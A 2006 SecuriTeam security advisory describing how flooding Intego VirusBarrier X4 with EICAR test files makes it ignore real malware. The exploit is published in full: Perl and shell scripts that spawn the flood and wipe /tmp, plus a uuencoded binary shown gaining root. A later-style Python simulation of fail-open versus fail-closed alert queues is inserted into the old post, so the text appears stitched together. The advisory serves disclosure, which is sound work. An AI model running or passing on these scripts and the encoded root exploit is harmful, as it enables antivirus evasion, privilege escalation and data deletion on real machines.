[NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)

Subject: [NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)
Date: 14 Nov 2006 15:31:39 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
  Intego VirusBarrier X4 Definition Bypass (Exploit)
------------------------------------------------------------------------


SUMMARY

Intego VirusBarrier X4 is "the simple, fast and non-intrusive antivirus 
security solution for Macintosh computers, by Intego, the leading 
publisher of personal security software for Macintosh. It offers thorough 
protection against viruses of all types, coming from infected files or 
applications, whether on CD-ROMs, DVDs or other removable media, or on 
files downloaded over the Internet or other types of networks".

Although VirusBarrier does a pretty good job of halting malicious activity, 
the product currently suffers from a flaw related to the number of alerts 
it can process simultaneously. If an attacker is able to trigger multiple 
alerts in quick succession, he or she may be able to cause VirusBarrier to 
completely ignore positive matches against virus definitions. The 
consequences of ignored matches may include full system compromise or 
further spreading of malware.

DETAILS

As an example we will show how VirusBarrier normally stops a local root 
exploit with behavior similar to 'OSX.ExploitMachex.A', then we will 
demonstrate how the VirusBarrier protection can be bypassed by using a 
simple flood of Eicar Test files.

Any typical attempt to access or execute a file or program that matches a 
VirusBarrier definition results in an alert on the user interface. There is 
a sweet-looking insulin bottle on the screen that slowly empties as the 
virus nears eradication.

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do 
('Ignore' || 'Repair')?

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus 
program existed at all.

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 
79(appserverusr), 80(admin)

On the other hand, if you choose 'Repair' the process is terminated dead in 
its tracks and the file is nulled out:

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how VirusBarrier is supposed to work. Under 
normal circumstances this would be adequate to stop a malicious attack.

If, however, an attacker floods the file system with dummy virus files at a 
quick rate, the VirusBarrier software will promptly stop responding after 
presenting the user with a few audible and visual alerts. After about 
40-some infected files in a row the system becomes confused, and in some 
cases VirusBarrier may stop responding completely. (Intego confirmed a 
limit of 20 files.)

When under attack the user may see dozens of messages on the screen. With 
our example code the messages are similar to the following:

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attacker's standpoint the exploitation is fairly quick and simple. 
Our example uses a local root exploit; however, this tactic could easily be 
applied to any existing malware technique that Intego VirusBarrier 
protects against. Code could in theory be run as a precursor to an InqTana 
attack as a means to bypass the Intego protection. The existing signatures 
for InqTana A, B, C and D would then be completely useless and an E variant 
would be born.

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl      Pwntego.sh      README.txt      pwntego.uu      
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; 
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; 
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied

In the above example 'OSX.ExploitMachex.A' is being executed on a machine 
that is actively protected by VirusBarrier. In a matter of seconds the 
Intego engine is flooded and the attacker has the ability to completely 
ignore any Intego virus and malware definitions.

One fun side effect of this attack is that the user must manually dismiss a 
number of alerts. The user is either forced to wait for each alert to time 
out on its own after several seconds or to respond to each one 
individually.

This attack has a fairly obvious signature in syslog if the attacker is 
making use of the example code provided in this text. Obviously, using 
random viruses and better randomised locations and names is a possible 
vector for a crafty attacker.

virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by 
OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by 
EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by 
EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 
by EICAR Test

With the current fixes in place, once VirusBarrier reaches 19 alerts the 
next malware is simply quarantined until the administrator can repair it. 
In our example, the additional processes get a permission error when they 
are executed.
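To make the difference between the old and the fixed behaviour concrete, here is an added example (constructed for this text, not Intego's implementation) of a toy alert queue: a match normally blocks the file and prompts the user, at most 20 prompts may be outstanding, and an unanswered prompt expires after a timeout. The one design decision modelled is what happens to a match that arrives while the queue is full: the vulnerable behaviour drops it and the file runs, the fixed behaviour quarantines it without asking. The class and function names, the 10-second timeout and the decoy paths are all assumptions of the example.

```python
from dataclasses import dataclass, field


@dataclass
class PendingAlert:
    path: str
    raised_at: float


@dataclass
class AlertQueue:
    """Toy model of an on-access scanner's alert queue (constructed illustration,
    not Intego's code). `max_pending` mirrors the 20-file limit the advisory
    mentions; `timeout` mirrors prompts that expire after several seconds."""
    max_pending: int = 20
    timeout: float = 10.0
    fail_closed: bool = True
    pending: list = field(default_factory=list)
    verdicts: dict = field(default_factory=dict)

    def _expire(self, now):
        # A prompt nobody answered in time: the file stays blocked rather than
        # being released, so waiting the timeout out gains the attacker nothing.
        still_open = []
        for a in self.pending:
            if now - a.raised_at >= self.timeout:
                self.verdicts[a.path] = "blocked-timeout"
            else:
                still_open.append(a)
        self.pending = still_open

    def on_match(self, path, now):
        """Called for every file that matches a definition; returns the verdict."""
        self._expire(now)
        if len(self.pending) < self.max_pending:
            self.pending.append(PendingAlert(path, now))
            verdict = "prompt"        # blocked until the user picks Ignore/Repair
        elif self.fail_closed:
            verdict = "quarantine"    # queue full: deny without asking (the fix)
        else:
            verdict = "ignored"       # queue full: match dropped, the file runs (the bug)
        self.verdicts[path] = verdict
        return verdict


def simulate_flood(fail_closed, decoys=40):
    """Flood the queue with `decoys` matches within half a second, then submit
    the file the flood was meant to cover, and finally a match that arrives
    after every outstanding prompt has expired."""
    q = AlertQueue(fail_closed=fail_closed)
    decoy_verdicts = [q.on_match("/tmp/decoy-%d" % i, now=i * 0.01) for i in range(decoys)]
    during = q.on_match("/tmp/excploit", now=1.0)   # queue still full
    after = q.on_match("/tmp/later", now=20.0)      # all prompts have timed out
    return {
        "prompted_decoys": decoy_verdicts.count("prompt"),
        "during_flood": during,
        "after_flood": after,
    }


if __name__ == "__main__":
    print("fail-open  :", simulate_flood(fail_closed=False))
    print("fail-closed:", simulate_flood(fail_closed=True))
```

The point the simulation makes is that the limit on outstanding prompts is not itself the problem; a scanner has to cap its UI work somehow. What matters is the default applied to the overflow, and "quarantine until an administrator looks" is the only default under which an attacker cannot buy a free pass by generating noise.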

Of course since everyone knows there is no malware for Macintosh this 
scenario would quite simply never be encountered..... *smirk*

The Intego staff was more than helpful and willing to address this issue 
in a timely fashion. After communications were established this problem 
was addressed, and fixes were out the door to customers in a matter of 2 
days. How about that for turn around time!

Workaround:
Please update to the latest version of Intego VirusBarrier and the latest 
Vdefs: http://www.intego.com/services/updates.asp?product=VirusBarrier

Intego has fixed this bug in the 2006/11/01 Vdef files.

Exploits:
Pwntego.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# If you are lucky this *may* bring VirusBarrier to 100% CPU usage also.
# It sounds like my mac mini is gonna fucking launch off my desk. heh!
system("rm -rf /tmp/* > /dev/null");
for($i =0; $i <= 40; $i=$i+1) # Is 40 the magic virus limit for Intego??
{
 system("./rand-eicar.pl&");
# sleep 1;
}
printf("\n");
printf("Injecting pwnacillin shot\n");
system("uudecode pwntego.uu;chmod +x pwntego; rm -rf /tmp/sh; cp -rf /usr/bin/id /tmp/sh; ./pwntego");
system("rm -rf /tmp/* > /dev/null");

Pwntego.sh
#!/bin/sh
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
rm -rf /tmp/*
# ./ paths assumed here: the posted copy reads /rand-eicar.pl and /pwntego,
# but the Perl variant above runs ./rand-eicar.pl from the pwntego directory.
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
./rand-eicar.pl &
uudecode pwntego.uu
chmod +x pwntego
rm -rf /tmp/sh
cp -rf /usr/bin/id /tmp/sh
./pwntego
rm -rf /tmp/*

pwntego.uu
begin 644 pwntego
M_NWZS@```!(``````````@````H```5$````A0````$````X7U]004=%6D52
M3P```````````````!`````````````````````````````````$`````0``
M`8Q?7U1%6%0````````````````0````$``````````0``````<````%````
M!0````!?7W1E>'0`````````````7U]415A4````````````````%K0```7X
M```&M`````(``````````(``!````````````%]?<&EC<WEM8F]L7W-T=6)?
M7U1%6%0````````````````<K`````````RL`````@``````````@```"```
M```````D7U]S>6UB;VQ?<W1U8@```%]?5$585````````````````!RL````
M````#*P````"``````````"````(`````````!1?7W!I8W-Y;6)O;'-T=6(Q
M7U]415A4````````````````'*P```*@```,K`````(``````````(``!`@`
M````````(%]?8W-T<FEN9P````````!?7U1%6%0````````````````?3```
M`+0```],`````@```````````````@```````````````0```=!?7T1!5$$`
M```````````````@````$````!`````0``````<````#````!@````!?7V1A
M=&$`````````````7U]$051!````````````````(`````"@```0``````(`
M`````````````````````````%]?;&%?<WEM8F]L7W!T<@!?7T1!5$$`````
M```````````@H````%0``!"@`````@``````````````!P```!4`````7U]N
M;%]S>6UB;VQ?<'1R`%]?1$%400```````````````"#T````&```$/0````"
M```````````````&````*@````!?7V1Y;&0`````````````7U]$051!````
M````````````(0P````<```1#`````(``````````````````````````%]?
M8G-S``````````````!?7T1!5$$````````````````A*````!``````````
M`P```````````````0``````````7U]C;VUM;VX``````````%]?1$%400``
M`````````````"%`````.``````````$```````````````!````````````
M```!````.%]?3$E.2T5$250``````````#`````0````(`````[8````!P``
M``$`````````!`````X````<````#"]U<W(O;&EB+V1Y;&0````````,````
M-````!A%(8IM`$<!!``!```O=7-R+VQI8B]L:6)3>7-T96TN0BYD>6QI8@``
M`````@```!@``"``````A@``)W0```=D````"P```%``````````5````%0`
M```7````:P```!L``````````````````````````````````":T````,```
M```````````````````````6````$```)D@````;````!0```+`````!````
M*```%K0`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````?#H+>#@A__Q4(0`T.````)`!``"4(?_`@'H``#B:``0[8P`!5WL0
M.GRDVA1(```)?^``"'P(`J:_@?_PD`$`")0A_Z!"GP`%?^@"IGQ\&WA\G2-X
M?+XK>$@``;$\7P``DX()!#Q?``"3H@D(/%\``)/""0P\7P``@$(*`(&"```O
MC```0;X`#'V)`Z9.@`0A/%\``(!""?R!@@``+XP``$&^``Q]B0.F3H`$(4@`
M!8T\7P``@8()&(`,```O@```0;X`#'V)`Z9.@`0A2```]3Q?``"!@@D4@`P`
M`"^```!!O@`,?8D#IDZ`!"$\?P``.&,(5#B!`$!(``%E@&$`0"^#``!!O@`(
M2``%$3@````\7P``@$()^)`"``"!/0``?2)+>"^)``!!G@!D.4```#E@``"(
M"0``?``'="^```!!G@`P?`)8KGP`!W0O@``O0+X`"'U+$A0Y:P`!?2)+>'P)
M6*Y\``=T+X```$">_]@OB@``09X`##@*``%(```(@!T``#Q?``"0`@D0?\;S
M>(`>```O@```09X`$(0&``0O@```0)[_^'^#XWA_I.MX?\7S>#C&``1(``+5
M2``$/7P(`J:3X?_\D`$`")0A_Z!"GP`%?^@"ICQ_```X8P;@.($`0$@``'F!
M@0!`?8D#IDZ`!"&``0!H."$`8'P(`Z:#X?_\3H``(#U@``"!:R$,+(L``$&&
M``A.@``@.*``3CB```!@A!^8.&```C@```1$```".&``.S@```%$```"?^``
M"#V```"`#"$,?`D#ICV```!AC!``3H`$(#U@``"!:R$0?6D#IDZ`!"!\"`*F
MOZ'_])`!``B4(?^@?#X+>)!^`'B0G@!\.&```3B``"A(``2I?&`;>)`>`$"`
M7@!`@!X`>)`"``2`7@!`@!X`?)`"``B`7@!`.```*)`"``"#O@!`.&`!+4@`
M!%&0?0`0.&`!+8">`$!(``0A@"$``(`!``A\"`.FNZ'_]$Z``"!\"`*FO\'_
M^)`!``B4(?^@?#X+>)!^`'B0G@!\.````)`>`$@X8`$M2``$`9!^`$`X'@!`
MD!X`1(!>`$2``@``+X```$">``A(``!X@%X`1(!"``"`0@`$@!X`>'^"``!`
MG@!,@%X`1(!"``"`0@`(@!X`?'^"``!`G@`T@%X`1(`"``"0'@!(@3X`1(!>
M`$B``@`0D`D``(!>`$B``@``+X``*$&>`!Q(``-!@%X`1(!"```X`@`0D!X`
M1$O__WPX8`$M@)X`0$@``T&`'@!(+X```$&>`#2`7@!(@`(`#"^```!!G@`<
M@%X`2(`"``R`?@!(?`P#>'V)`Z9.@`0A@'X`2$@``L6`(0``@`$`"'P(`Z:[
MP?_X3H``('P(`J:_P?_XD`$`")0A_Z!\/@MX0I\`!7_H`J9(``)Q/%\``(!"
M!BB``@`(D!X`0(`>`$`O@```09X`'(!>`$"@`@`$5``$/BN```)`G0`(2```
M'#Q?``"`8@5$2``"$3Q?``"`8@5`2``!Y8`A``"``0`(?`@#IKO!__A.@``@
M?`@"IK_!__B0`0`(E"'_H'P^"WA"GP`%?^@"ICQ?``"`0@6P@`(``)`>`$`X
M'@!$@'X`0#B```%\!0-X2``#L8!^`$"`G@!$@+X`1#C``!1(``-]@'X`0#B`
M``*`O@!$.,```SC@``%(``-%2``#(7Q@&W@O@```09X`*#Q?``"`8@6L.(`"
M`("^`$0XP```2``"W3A@``!(``*U2```+#A@``,\GP``.(0%T$@``H$\?P``
M.&,$D#R?```XA`2@.*```$@``DDX````?`,#>(`A``"``0`(?`@#IKO!__A.
M@``@?`@"IK_!__B0`0`(E"'_L'P^"WA"GP`%?^@"II!^`&B0G@!LD+X`<)#>
M`'20_@!XD1X`?)$^`("17@"$@'X`<(">`(PXH`"`.,```4@``;V`7@",@'X`
M<(""```\OP``.*4#Y#C``(!(``&!.````'P#`WB`(0``@`$`"'P(`Z:[P?_X
M3H``('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#['V)`Z9.@`0@?`@"ID*?``5]
M:`*F/6L``'P(`Z:%BP/0?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+
M`[1]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#F'V)`Z9.@`0@?`@"
MID*?``5]:`*F/6L``'P(`Z:%BP-\?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``
M?`@#IH6+`V!]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#1'V)`Z9.
M@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP,H?8D#IDZ`!"!\"`*F0I\`!7UH
M`J8]:P``?`@#IH6+`PQ]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L"
M\'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP+4?8D#IDZ`!"!\"`*F
M0I\`!7UH`J8]:P``?`@#IH6+`KA]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\
M"`.FA8L"G'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP*`?8D#IDZ`
M!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`F1]B0.F3H`$('P(`J9"GP`%?6@"
MICUK``!\"`.FA8L"2'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP(L
M?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`A!]B0.F3H`$('P(`J9"
MGP`%?6@"ICUK``!\"`.FA8L!]'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(
M`Z:%BP'8?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`;Q]B0.F3H`$
M(`````!?7V1Y;&1?;6]D7W1E<FU?9G5N8W,```!?7V1Y;&1?;6%K95]D96QA
M>65D7VUO9'5L95]I;FET:6%L:7IE<E]C86QL<P````!4:&4@:V5R;F5L('-U
M<'!O<G0@9F]R('1H92!D>6YA;6EC(&QI;FME<B!I<R!N;W0@<')E<V5N="!T
M;R!R=6X@=&AI<R!P<F]G<F%M+@H``"]U<W(O8FEN+V-H<V@```!C:'-H````
M````````````````````'TP``"%$```:P```&:0``!D@2```%0``````$```
M```````0``!\J`*F.&```SB%```X``##1````F`````X8```.```%T0```)@
M````.&```#@``+5$```"8````#AE`&@XA0!TD&0``#@``#M$```"8````#@`
M``%$```"+R\O+W1M<"]S:````````````````!CX```8^```&/@``!CX```8
M^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX
M```8^```&/@``!CX```8^```&/@`````````````````````````````````
M````````````````````````````&/@`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````0:9`$`````%K0```0B@`````````````1$@`````````````169`$`
M````%N@```179`$`````%N@```1P9`$`````%N@```2./`````````````2=
M#@8`````(!````2R#@8`````(!0`````1`$`L@``%N@`````1`$`O0``%PP`
M````1`$`P```%Q``````1`$`P0``%Q@`````1`$`P@``%R``````1`$`Q```
M%R@`````1`$`Q0``%SP`````1`$`Q@``%T0`````1`$`QP``%U@`````1`$`
MR@``%V``````1`$`SP``%V0`````1`$`T```%W@`````1`$`V0``%X``````
M1`$`W0``%X0`````1`$`W@``%Y@`````1`$`ZP``%Z``````1`$`[```%[``
M````1`$`[0``%[P`````1`$`\```%\``````1`$`\@``%]``````1`$`\P``
M%^``````1`$`]```%^0`````1`$`]0``%_@`````1`$`]@``&`@`````1`$`
M]```&`P`````1`$`^```&"0`````1`$`^0``&"P`````1`$`^P``&#0`````
M1`$!!@``&$``````1`$!"P``&%P`````1`$!#```&'0```3B)`$`L@``%N@`
M``3V@`````````````4"0```KP```!P```4M0```L````!T```550```L0``
M`!X```5A@`````````````5L@`````````````5X0```LP````L```6!0```
MM`````H```6*0```M@````8```63@```N0```$````6LP`$`````%PP```6M
MX`$`````&'0```6N)````````8P```6O#@$`````&'0`````1`$!)@``&'0`
M````1`$!*0``&(P`````1`$!*P``&)P`````1`$!+```&*@```7%)`$!)@``
M&'0```7A@``!)P```$````7IP`$`````&(P```7JX`$`````&+P```7K)```
M`````$@```7L(```+0````````7Z(```+@````````8((```+P````````87
M(```,`````````8I(```;@````````90(```;P````````9M)@8`=0``(!``
M``:()@8`>@``(!0```:^9`$`````&+P```:_#@D`````(0P```;D#@4`````
M'Y@```;R#@D`````(1`````@'@$`````&1`````S'@$`````&+P```!%'@$`
M````%N@```!6'@$`````&/@```<+#@$`````&2````<N#@$`````&:0```=4
M#@H`````(2@```=:#@8`````("`````$#P8`$```(``````,#P8`$```(`0`
M``!U#P$`````&L`````4#P8`$```(`P```"^#PL`````(4````#B`P``$```
M$`````#V#PL`````(40```$)#PL`$```(4@```$@#PL`$```(4P```$]#P$`
M$```'"0```%C#PL`$```(5````%V#PL`$```(50```&0#PL`$```(5@```&K
M#PL`$```(5P```'(#PL`$```(6````'B#PL`$```(60```(##PL`$```(6@`
M``(E#PL`$```(6P```))#PL`$```(7````!-#P8`$```(`@```**#P$`````
M&T````*0#PL`$```(70```!O#P$`````%K0```";`0`!`0````````*A`0`!
M``````````#+`0`!``````````*R`0`!`0````````+5`0`!`0````````+[
M`0`!`0````````,)`0`!`0````````,O`0`!`0````````-7`0`!`0``````
M``$!`0`!`0````````->`0`!`0````````)J`0`!``````````-L`0`!````
M``````-X`0`!`0````````)Q`0`!`0````````-_`0`!`0````````-F`0`!
M`0````````)W`0`!``````````.%`0`!`0````````.;`0`!`0````````.O
M`0`!`0````````/'`0`!``````````/8`0`!`0````````/C`0`!`0``````
M``/]`0`!`0````````0*`0`!`0````````04`0`!`0````````%?```!8```
M`>,```((```""@```A@```(:```"'@```R<```-N```#J```!*,```2N```$
MM```!+H```4,```%'```!Q<```<C```'*@``!S@```=(```)MP``"M````M3
M```+;@``"YP```!Y````=````&L```!O````;@```'````![````<P```'(`
M``!Q````=0```(0```"#````>````($```"%````?0```'H```""````?P``
M`'X```!Y````=````&L```!O````;@```'````![````<P```'(```!Q````
M=0```(0```"#````>````($```"%````?0```'H```""````?P```'X```!V
M````;0```'P```!L````=P```(``````7TY807)G8P!?3EA!<F=V`%]?7W!R
M;V=N86UE`%]?9'EL9%]F=6YC7VQO;VMU<`!?7V1Y;&1?:6YI=%]C:&5C:P!?
M7W-T87)T`%]E;G9I<F]N`&1Y;&1?<W1U8E]B:6YD:6YG7VAE;'!E<@!S=&%R
M=`!?7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F<F%M95]I;F9O`%]?7VME
M>6UG<E]D=V%R9C)?<F5G:7-T97)?<V5C=&EO;G,`7U]C<&QU<U]I;FET`%]?
M8W1H<F5A9%]I;FET7W)O=71I;F4`7U]M:%]E>&5C=71E7VAE861E<@!?7V]B
M:F-);FET`%]A=&5X:70`7V-A=&-H7V5X8V5P=&EO;E]R86ES90!?8V%T8VA?
M97AC97!T:6]N7W)A:7-E7W-T871E`%]C871C:%]E>&-E<'1I;VY?<F%I<V5?
M<W1A=&5?:61E;G1I='D`7V-L;V-K7V%L87)M7W)E<&QY`%]D;U]M86-H7VYO
M=&EF>5]D96%D7VYA;64`7V1O7VUA8VA?;F]T:69Y7VYO7W-E;F1E<G,`7V1O
M7VUA8VA?;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?;6%C:%]N;W1I9GE?<V5N
M9%]O;F-E`%]D;U]S97%N;W-?;6%C:%]N;W1I9GE?9&5A9%]N86UE`%]D;U]S
M97%N;W-?;6%C:%]N;W1I9GE?;F]?<V5N9&5R<P!?9&]?<V5Q;F]S7VUA8VA?
M;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?<V5Q;F]S7VUA8VA?;F]T:69Y7W-E
M;F1?;VYC90!?97)R;F\`7V5X:70`7VUA8VA?:6YI=%]R;W5T:6YE`%]M86EN
M`%]R96-E:79E7W-A;7!L97,`7U]?:V5Y;6=R7V=L;V)A;`!?7V1Y;&1?<F5G
M:7-T97)?9G5N8U]F;W)?861D7VEM86=E`%]?9'EL9%]R96=I<W1E<E]F=6YC
M7V9O<E]R96UO=F5?:6UA9V4`7U]I;FET7VME>6UG<@!?7VME>6UG<E]G971?
M86YD7VQO8VM?<')O8V5S<W=I9&5?<'1R`%]?:V5Y;6=R7W-E=%]A;F1?=6YL
M;V-K7W!R;V-E<W-W:61E7W!T<@!?86)O<G0`7V-A;&QO8P!?9G)E90!?97AC
M7W-E<G9E<@!?97AE8VP`7V9O<FL`7VUA8VA?;7-G7W-E<G9E<E]O;F-E`%]M
M86-H7W!O<G1?86QL;V-A=&4`7VUA8VA?<&]R=%]I;G-E<G1?<FEG:'0`7VUA
M8VA?=&%S:U]S96QF7P!?<V5T<FQI;6ET`%]T87-K7W-E=%]E>&-E<'1I;VY?
M<&]R=',`7W9M7V%L;&]C871E`%]V;5]W<FET90!?=V%I=`!S=&%R="YS`&EN
M=#IT,3UR,3LM,C$T-S0X,S8T.#LR,30W-#@S-C0W.P!C:&%R.G0R/7(R.S`[
M,3(W.P``+U-O=7)C94-A8VAE+T-S=2]#<W4M-#8O`"]3;W5R8V5#86-H92]#
M<W4O0W-U+30V+V-R="YC`&=C8S)?8V]M<&EL960N`%]P;VEN=&5R7W1O7V]B
M:F-);FET`%]P;VEN=&5R7W1O7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F
